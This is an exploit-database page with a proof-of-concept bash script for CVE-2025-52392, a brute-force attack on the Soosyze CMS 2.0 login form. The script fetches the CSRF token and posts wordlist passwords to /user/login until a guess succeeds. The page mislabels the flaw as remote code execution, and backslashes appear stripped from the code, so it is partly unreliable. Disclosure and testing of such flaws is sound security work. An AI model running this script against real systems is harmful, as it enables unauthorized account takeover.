Skip to main content
Home/Exploits/WebApps/Soosyze CMS 2.0 – Brute Force Login
EXPLOIT CRITICAL (9.8)

Soosyze CMS 2.0 – Brute Force Login

CVE ID: CVE-2025-52392
Vulnerability Type: Remote Code Execution (RCE)
Author: Beatriz Fresno Naumova
Categories: WebApps

Soosyze CMS 2.0 – Brute Force Login

Proof of Concept (PoC)

poc.sh 
# Exploit Title: Soosyze CMS 2.0 - Brute Force Login
# Google Dork: N/A
# Date: 2025-08-13
# Exploit Author: Beatriz Fresno Naumova (beafn28)
# Vendor Homepage: https://soosyze.com/
# Software Link: https://github.com/soosyze/soosyze
# Version: 2.0 (tested)
# Tested on: macOS Sonoma 14.x (Apple Silicon M1), /bin/bash 3.2 & Homebrew bash 5.2, curl 8.x, BSD sed
# CVE : CVE-2025-52392

# Description:
# Soosyze CMS 2.0 allows brute-force login attacks via /user/login due to missing rate limiting
# and account lockout mechanisms. An attacker can submit unlimited POST requests with a known
# username/email and a password wordlist, potentially gaining unauthorized access (CWE-307).

# PoC Usage:
#   ./script.sh [wordlist.txt]
# If no wordlist is provided, a dictionary is used.

#!/usr/bin/env bash

set -euo pipefail

BASE_URL="http://localhost:8000"
LOGIN_PATH="/user/login"
EMAIL_FIELD="email"
PASS_FIELD="password"
TARGET_EMAIL="[email protected]"

WORDLIST_FILE="${1:-}"
DEFAULT_WORDS=("123456" "admin" "password" "qwerty" "letmein" "admin123" "password1")

form_url="$BASE_URL$LOGIN_PATH"
COOKIE_JAR="$(mktemp)"

get_form() {
    curl -sS -c "$COOKIE_JAR" -b "$COOKIE_JAR" "$form_url" > /tmp/login_page.html
}

extract_token() {
    local name value
    name=$(sed -nE 's/.*name="([_a-zA-Z0-9:-]*(token|csrf)[_a-zA-Z0-9:-]*)".*type="hidden".*/1/p' /tmp/login_page.html | head -n1 || true)
    value=""
    if [[ -n "$name" ]]; then
        value=$(sed -nE "s/.*name="$name".*value="([^"]*)".*/1/p" /tmp/login_page.html | head -n1 || true)
    fi
    printf '%st%sn' "$name" "$value"
}

post_login() {
    local pass="$1" tname="$2" tval="$3"
    curl -sS -o /tmp/resp.html -w "%{http_code}" 
        -c "$COOKIE_JAR" -b "$COOKIE_JAR" 
        -X POST "$form_url" 
        -H "Content-Type: application/x-www-form-urlencoded" 
        -H "Origin: $BASE_URL" -H "Referer: $form_url" 
        --data-urlencode "$EMAIL_FIELD=$TARGET_EMAIL" 
        --data-urlencode "$PASS_FIELD=$pass" 
        $( [[ -n "$tname" && -n "$tval" ]] && printf -- '--data-urlencode %s=%s' "$tname" "$tval" )
}

echo "[*] Starting brute-force attack on $form_url"
[[ -n "$WORDLIST_FILE" && -r "$WORDLIST_FILE" ]] && mapfile -t words < "$WORDLIST_FILE" || words=("${DEFAULT_WORDS[@]}")

i=0
for pw in "${words[@]}"; do
    i=$((i+1))
    get_form
    IFS=$'t' read -r TOKEN_NAME TOKEN_VALUE < <(extract_token)
    code=$(post_login "$pw" "$TOKEN_NAME" "$TOKEN_VALUE")

    if grep -q '"redirect"' /tmp/resp.html; then
        echo -e "[$i] Password found: 'e[1m$pwe[0m' (HTTP $code)"
        break
    else
        echo "[$i] '$pw' (HTTP $code)"
    fi

    sleep 0.$((RANDOM%9+1))
done

rm -f "$COOKIE_JAR" /tmp/resp.html

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.

sh3llz@loading:~$
Loading security modules...